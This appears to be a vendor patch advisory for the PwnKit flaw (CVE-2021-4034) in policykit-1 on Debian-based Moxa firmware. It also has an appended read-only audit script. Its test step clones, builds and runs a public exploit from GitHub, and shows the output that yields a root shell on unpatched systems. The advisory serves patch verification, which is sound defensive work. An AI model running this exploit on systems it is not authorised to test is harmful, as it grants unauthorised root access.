For firmware using Debian or Moxa Industrial Linux (MIL), follow the steps below to upgrade the policykit-1 package to the latest version for CVE-2021-4034.
Step 1. Check if the Moxa Debian repository is in the apt source list.
Open moxa.sources.list in the vi editor.
root@Linux:~$ sudo vi /etc/apt/sources.list.d/moxa.sources.list
Or
root@Linux:~$ sudo vi /etc/apt/sources.list
If it is not, add the line that matches your Debian version to moxa.sources.list.
For Debian 9.x,
deb http://deb.debian.org/debian stretch main contrib non-free
For Debian 10.x,
deb http://deb.debian.org/debian buster main contrib non-free
For Debian 11.x,
deb http://deb.debian.org/debian bullseye main contrib non-free
Step 2. Update the apt package index.
root@Linux:~$ apt-get update
Step 3. Install the latest policykit-1 package for CVE-2021-4034.
root@Linux:~$ apt-get install policykit-1
Step 4. Perform a test for this patch.
First, get the exploit script from GitHub.
moxa@Linux:~/$ git clone https://github.com/berdav/CVE-2021-4034.git
Next, build the program.
moxa@Linux:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
Then, run the CVE-2021-4034 test program on a system that has not been patched. The test program will obtain root privileges.
moxa@Linux:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
Note: if the system has already been patched, running the test program shows the following result instead.
moxa@Linux:~/CVE-2021-4034$ ./cve-2021-4034
pkexec --version |
--help |
--disable-internal-agent |
[--user username] PROGRAM [ARGUMENTS...]
See the pkexec manual page for more details.
Step 5. Those who can’t patch immediately should use the command below to remove the SUID-bit from pkexec:
root@Linux:~$ chmod 0755 /usr/bin/pkexec
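The state that Steps 1, 3 and 5 leave behind can also be checked without running exploit code. The script below is an added example, not part of the vendor's advisory; its function names are hypothetical, and the fixed package version is an argument the caller supplies from the Debian security tracker for their release. Invoke it with two arguments, the suite name and that fixed version.

```shell
#!/bin/sh
# Added example: read-only audit of Steps 1, 3 and 5. Function names are hypothetical.
# Step 1: succeed if any FILE has an active (uncommented) "deb" entry for SUITE.
# usage: suite_enabled SUITE FILE...
suite_enabled() {
    suite=$1; shift
    for f in "$@"; do
        [ -r "$f" ] || continue
        # One-line entry layout: deb [options] URI SUITE COMPONENT...
        awk -v s="$suite" '
            $1 == "deb" {
                i = 2
                if ($i ~ /^\[/) { while (i <= NF && $i !~ /\]$/) i++; i++ }
                if ($(i + 1) == s) found = 1
            }
            END { exit !found }' "$f" && return 0
    done
    return 1
}

# Step 3: succeed if installed policykit-1 >= FIXED_VERSION (caller-supplied,
# taken from the Debian security tracker; no version is assumed here).
policykit_at_least() {
    installed=$(dpkg-query -W -f='${Version}' policykit-1 2>/dev/null) || return 2
    dpkg --compare-versions "$installed" ge "$1"
}

# Step 5: print the setuid state of pkexec (or of the given path) without changing it.
pkexec_suid_state() {
    p=${1:-/usr/bin/pkexec}
    if [ ! -e "$p" ]; then echo missing
    elif [ -u "$p" ]; then echo suid-set
    else echo suid-cleared
    fi
}

# usage: pkexec_audit SUITE FIXED_VERSION
pkexec_audit() {
    if suite_enabled "$1" /etc/apt/sources.list /etc/apt/sources.list.d/*.list
    then echo "apt source for $1: present"
    else echo "apt source for $1: absent"
    fi
    if policykit_at_least "$2"
    then echo "policykit-1: at or above $2"
    else echo "policykit-1: below $2 or not installed"
    fi
    echo "pkexec: $(pkexec_suid_state)"
}
if [ "$#" -eq 2 ]; then pkexec_audit "$1" "$2"; fi
```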